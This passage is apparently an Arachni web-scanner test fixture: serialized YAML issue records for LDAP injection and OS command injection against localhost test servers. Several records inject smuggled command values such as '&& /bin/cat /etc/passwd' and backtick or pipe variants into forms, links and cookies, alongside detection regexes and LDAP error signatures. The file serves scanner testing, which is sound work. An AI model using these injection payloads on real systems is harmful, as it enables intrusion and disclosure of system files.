VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW5jb3JyZWN0
- !binary |-
VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW52YWxpZA==
- !binary |-
VGhlIHNlYXJjaCBmaWx0ZXIgY2Fubm90IGJlIHJlY29nbml6ZWQ=
- !binary |-
SW52YWxpZCBETiBzeW50YXg=
- !binary |-
Tm8gU3VjaCBPYmplY3Q=
- !binary |-
SVBXb3Jrc0FTUC5MREFQ
- !binary |-
TW9kdWxlIFByb2R1Y3RzLkxEQVBNdWx0aVBsdWdpbnM=
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '#^($!@$)(()))******'
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value#^($!@$)(()))******
:injected: cookie value#^($!@$)(()))******
:combo:
!binary "Y29va2llMg==": cookie value#^($!@$)(()))******
:action: http://localhost:13347/cookie/append
:verification: false
:id: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
var: cookie2
url: http://localhost:13347/cookie/append
injected: cookie value#^($!@$)(()))******
id: supplied argument is not a valid ldap
regexp: supplied argument is not a valid ldap
regexp_match: supplied argument is not a valid ldap
elem: cookie
remarks: {}
method: GET
response: ! 'supplied argument is not a valid ldap
javax.naming.NameNotFoundException
LDAPException
com.sun.jndi.ldap
Search: Bad search filter
Protocol error occurred
Size limit has exceeded
An inappropriate matching occurred
A constraint violation occurred
The syntax is invalid
Object does not exist
The alias is invalid
The distinguished name has an invalid syntax
The server does not handle directory requests
There was a naming violation
There was an object class violation
Results returned are too large
Unknown error occurred
Local error occurred
The search filter is incorrect
The search filter is invalid
The search filter cannot be recognized
Invalid DN syntax
No Such Object
IPWorksASP.LDAP
Module Products.LDAPMultiPlugins
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value#^($!@$)(()))******
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzIz
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: LDAP Injection
description: ! "LDAP queries can be injected into the web application\n which
can be used to disclose sensitive data of affect the execution flow."
tags:
- ldap
- injection
- regexp
cwe: '90'
cwe_url: http://cwe.mitre.org/data/definitions/90.html
severity: High
cvssv2: ''
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used in an LDAP query."
remedy_code: ''
mod_name: LDAPInjection
variations: []
internal_modname: LDAPInjection
internal_modname: LDAPInjection
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
OWASP: http://www.owasp.org/index.php/LDAP_injection
var: User-Agent
url: http://localhost:13347/header/append
elem: header
method: GET
name: LDAP Injection
description: ! "LDAP queries can be injected into the web application\n which
can be used to disclose sensitive data of affect the execution flow."
tags:
- ldap
- injection
- regexp
cwe: '90'
cwe_url: http://cwe.mitre.org/data/definitions/90.html
severity: High
cvssv2: ''
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used in an LDAP query."
remedy_code: ''
mod_name: LDAPInjection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WASC: http://projects.webappsec.org/w/page/13246947/LDAP-Injection
OWASP: http://www.owasp.org/index.php/LDAP_injection
opts:
:redundant: false
:async: true
:regexp: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
:match: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
:substring:
- !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
- !binary |-
amF2YXgubmFtaW5nLk5hbWVOb3RGb3VuZEV4Y2VwdGlvbg==
- !binary |-
TERBUEV4Y2VwdGlvbg==
- !binary |-
Y29tLnN1bi5qbmRpLmxkYXA=
- !binary |-
U2VhcmNoOiBCYWQgc2VhcmNoIGZpbHRlcg==
- !binary |-
UHJvdG9jb2wgZXJyb3Igb2NjdXJyZWQ=
- !binary |-
U2l6ZSBsaW1pdCBoYXMgZXhjZWVkZWQ=
- !binary |-
QW4gaW5hcHByb3ByaWF0ZSBtYXRjaGluZyBvY2N1cnJlZA==
- !binary |-
QSBjb25zdHJhaW50IHZpb2xhdGlvbiBvY2N1cnJlZA==
- !binary |-
VGhlIHN5bnRheCBpcyBpbnZhbGlk
- !binary |-
T2JqZWN0IGRvZXMgbm90IGV4aXN0
- !binary |-
VGhlIGFsaWFzIGlzIGludmFsaWQ=
- !binary |-
VGhlIGRpc3Rpbmd1aXNoZWQgbmFtZSBoYXMgYW4gaW52YWxpZCBzeW50YXg=
- !binary |-
VGhlIHNlcnZlciBkb2VzIG5vdCBoYW5kbGUgZGlyZWN0b3J5IHJlcXVlc3Rz
- !binary |-
VGhlcmUgd2FzIGEgbmFtaW5nIHZpb2xhdGlvbg==
- !binary |-
VGhlcmUgd2FzIGFuIG9iamVjdCBjbGFzcyB2aW9sYXRpb24=
- !binary |-
UmVzdWx0cyByZXR1cm5lZCBhcmUgdG9vIGxhcmdl
- !binary |-
VW5rbm93biBlcnJvciBvY2N1cnJlZA==
- !binary |-
TG9jYWwgZXJyb3Igb2NjdXJyZWQ=
- !binary |-
VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW5jb3JyZWN0
- !binary |-
VGhlIHNlYXJjaCBmaWx0ZXIgaXMgaW52YWxpZA==
- !binary |-
VGhlIHNlYXJjaCBmaWx0ZXIgY2Fubm90IGJlIHJlY29nbml6ZWQ=
- !binary |-
SW52YWxpZCBETiBzeW50YXg=
- !binary |-
Tm8gU3VjaCBPYmplY3Q=
- !binary |-
SVBXb3Jrc0FTUC5MREFQ
- !binary |-
TW9kdWxlIFByb2R1Y3RzLkxEQVBNdWx0aVBsdWdpbnM=
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '#^($!@$)(()))******'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user#^($!@$)(()))******
:injected: arachni_user#^($!@$)(()))******
:combo:
User-Agent: arachni_user#^($!@$)(()))******
:action: http://localhost:13347/header/append
:verification: false
:id: !binary |-
c3VwcGxpZWQgYXJndW1lbnQgaXMgbm90IGEgdmFsaWQgbGRhcA==
var: User-Agent
url: http://localhost:13347/header/append
injected: arachni_user#^($!@$)(()))******
id: supplied argument is not a valid ldap
regexp: supplied argument is not a valid ldap
regexp_match: supplied argument is not a valid ldap
elem: header
remarks: {}
method: GET
response: ! 'supplied argument is not a valid ldap
javax.naming.NameNotFoundException
LDAPException
com.sun.jndi.ldap
Search: Bad search filter
Protocol error occurred
Size limit has exceeded
An inappropriate matching occurred
A constraint violation occurred
The syntax is invalid
Object does not exist
The alias is invalid
The distinguished name has an invalid syntax
The server does not handle directory requests
There was a naming violation
There was an object class violation
Results returned are too large
Unknown error occurred
Local error occurred
The search filter is incorrect
The search filter is invalid
The search filter cannot be recognized
Invalid DN syntax
No Such Object
IPWorksASP.LDAP
Module Products.LDAPMultiPlugins
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user#^($!@$)(()))******
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzIz
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOToxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: LDAP Injection
description: ! "LDAP queries can be injected into the web application\n which
can be used to disclose sensitive data of affect the execution flow."
tags:
- ldap
- injection
- regexp
cwe: '90'
cwe_url: http://cwe.mitre.org/data/definitions/90.html
severity: High
cvssv2: ''
remedy_guidance: ! "User inputs must be validated and filtered\n before being
used in an LDAP query."
remedy_code: ''
mod_name: LDAPInjection
variations: []
internal_modname: LDAPInjection
internal_modname: LDAPInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: input
url: http://localhost:12305/unix/form/append
elem: form
method: GET
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
:match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
:substring:
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:injected_orig: ! ' /bin/cat /etc/passwd'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default /bin/cat /etc/passwd
:follow_location: true
:injected: default /bin/cat /etc/passwd
:combo:
!binary "aW5wdXQ=": default /bin/cat /etc/passwd
:action: http://localhost:12305/unix/form/append
:verification:
:id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
var: input
url: http://localhost:12305/unix/form/append
injected: default /bin/cat /etc/passwd
id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
elem: form
remarks: {}
method: GET
response: ! '["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOToxMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations: []
internal_modname: OSCmdInjection
internal_modname: OSCmdInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: input
url: http://localhost:12305/unix/form/straight
elem: form
method: POST
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
:match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
:substring:
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:injected_orig: ! '&& /bin/cat /etc/passwd'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ! '&& /bin/cat /etc/passwd'
:follow_location: true
:injected: ! '&& /bin/cat /etc/passwd'
:combo:
!binary "aW5wdXQ=": ! '&& /bin/cat /etc/passwd'
:action: http://localhost:12305/unix/form/straight
:verification:
:id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
var: input
url: http://localhost:12305/unix/form/straight
injected: ! '&& /bin/cat /etc/passwd'
id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
elem: form
remarks: {}
method: POST
response: ! '["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOToxMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations: []
internal_modname: OSCmdInjection
internal_modname: OSCmdInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: input
url: http://localhost:12305/unix/link/append?input=default
elem: link
method: GET
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
:match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
:substring:
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:injected_orig: ! ' /bin/cat /etc/passwd'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default /bin/cat /etc/passwd
:follow_location: true
:injected: default /bin/cat /etc/passwd
:combo:
!binary "aW5wdXQ=": default /bin/cat /etc/passwd
:action: http://localhost:12305/unix/link/append?input=default
:verification:
:id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
var: input
url: http://localhost:12305/unix/link/append?input=default
injected: default /bin/cat /etc/passwd
id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
elem: link
remarks: {}
method: GET
response: ! '["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations: []
internal_modname: OSCmdInjection
internal_modname: OSCmdInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: input
url: http://localhost:12305/unix/link/straight?input=default
elem: link
method: GET
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
:match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
:substring:
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:injected_orig: ! '&& /bin/cat /etc/passwd'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ! '&& /bin/cat /etc/passwd'
:follow_location: true
:injected: ! '&& /bin/cat /etc/passwd'
:combo:
!binary "aW5wdXQ=": ! '&& /bin/cat /etc/passwd'
:action: http://localhost:12305/unix/link/straight?input=default
:verification:
:id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
var: input
url: http://localhost:12305/unix/link/straight?input=default
injected: ! '&& /bin/cat /etc/passwd'
id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
elem: link
remarks:
:stuff:
- Blah
- Blah2
method: GET
response: ! '["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOToxNCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations: []
internal_modname: OSCmdInjection
internal_modname: OSCmdInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: cookie2
url: http://localhost:12305/unix/cookie/append
elem: cookie
method: GET
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
:match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
:substring:
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:injected_orig: ! '` /bin/cat /etc/passwd`'
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value` /bin/cat /etc/passwd`
:injected: cookie value` /bin/cat /etc/passwd`
:combo:
!binary "Y29va2llMg==": cookie value` /bin/cat /etc/passwd`
:action: http://localhost:12305/unix/cookie/append
:verification:
:id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
var: cookie2
url: http://localhost:12305/unix/cookie/append
injected: cookie value` /bin/cat /etc/passwd`
id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
elem: cookie
remarks: {}
method: GET
response: ! '["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value`+/bin/cat+/etc/passwd`;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOToxOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations: []
internal_modname: OSCmdInjection
internal_modname: OSCmdInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: cookie
url: http://localhost:12305/unix/cookie/straight
elem: cookie
method: GET
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
:match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
:substring:
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:injected_orig: ! '| /bin/cat /etc/passwd'
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": ! '| /bin/cat /etc/passwd'
:injected: ! '| /bin/cat /etc/passwd'
:combo:
!binary "Y29va2ll": ! '| /bin/cat /etc/passwd'
:action: http://localhost:12305/unix/cookie/straight
:verification:
:id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
var: cookie
url: http://localhost:12305/unix/cookie/straight
injected: ! '| /bin/cat /etc/passwd'
id: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
regexp: (?-mix:root:x:0:0:.+:[0-9a-zA-Z\/]+)
regexp_match: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh
elem: cookie
remarks: {}
method: GET
response: ! '["root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=|+/bin/cat+/etc/passwd
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
